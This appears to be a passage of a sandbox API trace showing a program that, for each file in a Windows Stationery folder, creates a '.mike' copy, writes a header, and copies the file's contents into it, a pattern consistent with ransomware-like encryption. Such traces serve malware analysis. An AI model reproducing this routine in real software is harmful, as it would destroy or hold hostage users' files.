nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.459] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.459] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.460] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.460] WriteFile (in: hFile=0x288, lpBuffer=0x20df824*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20df824*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.461] CloseHandle (hObject=0x288) returned 1 [0053.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.461] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), fInfoLevelId=0x0, lpFileInformation=0x20df2f8 | out: lpFileInformation=0x20df2f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f)) returned 1 [0053.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.461] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.462] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.462] ReadFile (in: hFile=0x288, lpBuffer=0x20e0960, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20e0960*, lpNumberOfBytesRead=0x2af0c8*=0xa0f, lpOverlapped=0x0) returned 1 [0053.463] CloseHandle (hObject=0x288) returned 1 [0053.464] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.464] GetFileType (hFile=0x288) returned 0x1 [0053.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.464] GetFileType (hFile=0x288) returned 0x1 [0053.464] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.464] WriteFile (in: hFile=0x288, lpBuffer=0x20ea494*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20ea494*, lpNumberOfBytesWritten=0x2af0bc*=0xa10, lpOverlapped=0x0) returned 1 [0053.464] CloseHandle (hObject=0x288) returned 1 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.465] GetFileType (hFile=0x288) returned 0x1 [0053.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.466] GetFileType (hFile=0x288) returned 0x1 [0053.467] WriteFile (in: hFile=0x288, lpBuffer=0x20ed6d4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x20ed6d4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.467] CloseHandle (hObject=0x288) returned 1 [0053.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.468] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9278000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9278000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe929e160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0053.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.468] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x20eee60 | out: lpFileInformation=0x20eee60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9278000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9278000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe929e160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0053.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", dwFileAttributes=0x80) returned 0 [0053.470] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.470] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.470] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9278000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9278000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe929e160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0053.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.470] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.470] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike", lpFilePart=0x0) returned 0x50 [0053.470] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.mike")) returned 1 [0053.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", lpFilePart=0x0) returned 0x4b [0053.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", lpFilePart=0x0) returned 0x4a [0053.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini", lpFilePart=0x0) returned 0x45 [0053.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", lpFilePart=0x0) returned 0x4a [0053.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.473] GetFileType (hFile=0x288) returned 0x1 [0053.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.473] GetFileType (hFile=0x288) returned 0x1 [0053.473] CloseHandle (hObject=0x288) returned 1 [0053.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.474] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.474] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), fInfoLevelId=0x0, lpFileInformation=0x20fa17c | out: lpFileInformation=0x20fa17c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7)) returned 1 [0053.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), fInfoLevelId=0x0, lpFileInformation=0x20fa48c | out: lpFileInformation=0x20fa48c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7)) returned 1 [0053.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.475] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.475] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.476] GetFileType (hFile=0x288) returned 0x1 [0053.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.476] GetFileType (hFile=0x288) returned 0x1 [0053.476] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.476] WriteFile (in: hFile=0x288, lpBuffer=0x20fb2a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20fb2a4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.477] CloseHandle (hObject=0x288) returned 1 